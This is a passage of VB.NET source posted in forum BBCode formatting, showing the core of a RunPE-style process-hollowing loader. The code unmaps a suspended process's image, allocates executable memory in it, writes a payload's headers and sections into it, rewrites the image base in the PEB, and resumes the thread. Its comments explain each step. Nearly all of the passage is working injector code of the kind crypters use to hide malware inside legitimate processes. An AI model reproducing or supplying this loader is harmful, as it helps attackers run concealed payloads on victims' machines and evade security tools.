[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] If dwImageBase = BaseAddress Then 'COMMENT: If the BaseAddress of our Exe is matching the ImageBase, it's because it's mapped and we have to unmap it[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] If Not NtUnmapViewOfSection(PI.hProcess, BaseAddress) = 0 Then Throw New Exception() 'COMMENT: Unmapping it[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] End If[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim dwSizeOfImage As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H50)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim dwNewImageBase As Integer = VirtualAllocEx(PI.hProcess, dwImageBase, dwSizeOfImage, &H3000, &H40) 'COMMENT: Makes the process ready to write in by specifying how much space we need to do it and where we need it[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] If dwNewImageBase = 0 Then Throw New Exception()[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim dwSizeOfHeaders As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H54)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] If Not WriteProcessMemory(PI.hProcess, dwNewImageBase, payload, dwSizeOfHeaders, ReadWrite) Then Throw New Exception() 'Writes the size of the payloads PE header to the target[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] 'COMMENT: This is here where most of the magic happens. We write in all our sections data, which contains our resssources, code and the information to utilize the sections: VirtualAddress, SizeOfRawData and PointerToRawData[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim SizeOfOptionalHeader As Short = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H14)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim SectionOffset As Integer = dwPEHeaderAddress + (&H16 + SizeOfOptionalHeader + &H2)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim NumberOfSections As Short = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H6)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] For I As Integer = 0 To NumberOfSections - 1[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim VirtualAddress As Integer = BitConverter.ToInt32(payload, SectionOffset + &HC)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim SizeOfRawData As Integer = BitConverter.ToInt32(payload, SectionOffset + &H10)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim PointerToRawData As Integer = BitConverter.ToInt32(payload, SectionOffset + &H14)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] If Not SizeOfRawData = 0 Then[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim SectionData(SizeOfRawData - 1) As Byte[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Buffer.BlockCopy(payload, PointerToRawData, SectionData, 0, SectionData.Length)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] If Not WriteProcessMemory(PI.hProcess, dwNewImageBase + VirtualAddress, SectionData, SectionData.Length, ReadWrite) Then Throw New Exception()[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] End If[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] SectionOffset += &H28[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Next[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim PointerData As Byte() = BitConverter.GetBytes(dwNewImageBase)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] If TargetIs64 = True Then[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] If Not WriteProcessMemory(PI.hProcess, PEBAddress64 + &H10, PointerData, 4, ReadWrite) Then Throw New Exception() 'Writes the new etrypoint for 64bit target[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Else[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] If Not WriteProcessMemory(PI.hProcess, PEBAddress32 + &H8, PointerData, 4, ReadWrite) Then Throw New Exception() 'Writes the new entrypoint for 32bit target[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] End If[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] If ResumeThread(PI.hThread) = -1 Then Throw New Exception() 'Resumes the suspended target with all its new exciting data[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Catch ex As Exception[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Dim P As Process = Process.GetProcessById(CInt(PI.dwProcessId))[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] If P IsNot Nothing Then P.Kill()[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Return False[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] End Try[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] Return True[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif] End Function[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]#End Region[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][size=small][font=Roboto, sans-serif]End Class
